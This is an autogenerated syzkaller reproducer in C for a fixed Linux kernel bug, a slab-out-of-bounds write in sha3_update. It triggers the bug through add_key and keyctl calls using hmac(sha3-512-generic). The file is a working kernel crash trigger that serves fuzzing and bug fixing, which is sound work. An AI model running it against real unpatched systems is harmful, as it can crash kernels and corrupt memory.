syzkaller-repros/linux/c01b681112a03bcbc81985e74fa084e0fdaf28b3.c

// KASAN: slab-out-of-bounds Write in sha3_update (2)
// https://syzkaller.appspot.com/bug?id=c01b681112a03bcbc81985e74fa084e0fdaf28b3
// status:fixed
// autogenerated by syzkaller (http://github.com/google/syzkaller)

#define _GNU_SOURCE

#include <sys/syscall.h>
#include <unistd.h>

#include <stdint.h>
#include <string.h>

long r[3];
void loop()
{
  memset(r, -1, sizeof(r));
  syscall(__NR_mmap, 0x20000000ul, 0xfff000ul, 0x3ul, 0x32ul,
          0xfffffffffffffffful, 0x0ul);
  memcpy((void*)0x20f8bff8, "keyring", 8);
  *(uint8_t*)0x20f36ffb = (uint8_t)0x73;
  *(uint8_t*)0x20f36ffc = (uint8_t)0x79;
  *(uint8_t*)0x20f36ffd = (uint8_t)0x7a;
  *(uint8_t*)0x20f36ffe = (uint8_t)0x20;
  *(uint8_t*)0x20f36fff = (uint8_t)0x0;
  r[0] = syscall(__NR_add_key, 0x20f8bff8ul, 0x20f36ffbul, 0x0ul, 0x0ul,
                 0x0ul);
  memcpy((void*)0x20337ffb, "user", 5);
  *(uint8_t*)0x20394000 = (uint8_t)0x73;
  *(uint8_t*)0x20394001 = (uint8_t)0x79;
  *(uint8_t*)0x20394002 = (uint8_t)0x7a;
  *(uint8_t*)0x20394003 = (uint8_t)0x20;
  *(uint8_t*)0x20394004 = (uint8_t)0x0;
  memcpy((void*)0x20e4effe, "\x00\x05", 2);
  r[1] = syscall(__NR_add_key, 0x20337ffbul, 0x20394000ul, 0x20e4effeul,
                 0x2ul, r[0]);
  memcpy((void*)0x20893000, "user", 5);
  *(uint8_t*)0x20062000 = (uint8_t)0x73;
  *(uint8_t*)0x20062001 = (uint8_t)0x79;
  *(uint8_t*)0x20062002 = (uint8_t)0x7a;
  *(uint8_t*)0x20062003 = (uint8_t)0x23;
  *(uint8_t*)0x20062004 = (uint8_t)0x0;
  memcpy((void*)0x20789ec7,
         "\xb3\x3a\xb7\x00\x78\xeb\xe0\xd9\x4f\x72\x9c\xf8\x53\xe5\x20"
         "\xc1\x9a\xd7\xd9\x7f\xe2\x17\x69\xe7\xc4\xdb\x44\xc2\x49\xb5"
         "\x44\x23\x0b\xa2\x87\xfb\x8b\xd6\xed\x26\x6c\xcf\x59\xef\x70"
         "\x99\x08\x00\x00\x00\xec\xd3\xff\xf3\x28\x53\x74\x7e\xda\x22"
         "\xd2\x81\x8d\x08\xca\x27\xe0\xec\x82\x16\x20\xe3\x65\xa0\xe6"
         "\xb9\x48\x5f\x2d\x92\x54\x93\xf6\x0c\x01\xe3\x3e\x5f\x8c\x7e"
         "\xba\x67\xfc\x19\xa9\x49\x08\x00\x00\x00\xdf\x9d\x2e\x87\x5b"
         "\x06\x6c\xd6\x40\xb3\x36\x61\x6f\xe0\xf3\xc3\x00\x28\x13\xb4"
         "\x62\x7e\xe7\x59\x76\x89\x52\x5e\x8e\x81\xf7\x50\xa8\x6e\xb5"
         "\x80\xfb\x46\x90\xea\x52\x24\x6b\xd3\xd3\x2b\x1a\x91\xf9\x44"
         "\xed\xb7\x4b\x1f\x50\xae\x08\xc5\x38\x7e\xd8\x00\x00\x00\xa4"
         "\x00\x57\x9f\x3a\xf3\xf8\x64\xe1\xc3\x24\xf6\x92\x8f\x66\x72"
         "\xf9\x87\xca\x14\x9b\xe3\x1b\xd7\x8b\x6e\x8b\x96",
         192);
  r[2] = syscall(__NR_add_key, 0x20893000ul, 0x20062000ul, 0x20789ec7ul,
                 0xc0ul, r[0]);
  *(uint32_t*)0x204c8ff4 = r[1];
  *(uint32_t*)0x204c8ff8 = r[2];
  *(uint32_t*)0x204c8ffc = r[1];
  *(uint64_t*)0x208e6fd4 = (uint64_t)0x20621fea;
  *(uint64_t*)0x208e6fdc = (uint64_t)0x20842000;
  *(uint32_t*)0x208e6fe4 = (uint32_t)0x0;
  *(uint32_t*)0x208e6fe8 = (uint32_t)0x0;
  *(uint32_t*)0x208e6fec = (uint32_t)0x0;
  *(uint32_t*)0x208e6ff0 = (uint32_t)0x0;
  *(uint32_t*)0x208e6ff4 = (uint32_t)0x0;
  *(uint32_t*)0x208e6ff8 = (uint32_t)0x0;
  *(uint32_t*)0x208e6ffc = (uint32_t)0x0;
  *(uint32_t*)0x208e7000 = (uint32_t)0x0;
  *(uint32_t*)0x208e7004 = (uint32_t)0x0;
  memcpy((void*)0x20621fea, "hmac(sha3-512-generic)", 22);
  syscall(__NR_keyctl, 0x17ul, 0x204c8ff4ul, 0x20c2cffful, 0x1ul,
          0x208e6fd4ul);
}

int main()
{
  loop();
  return 0;
}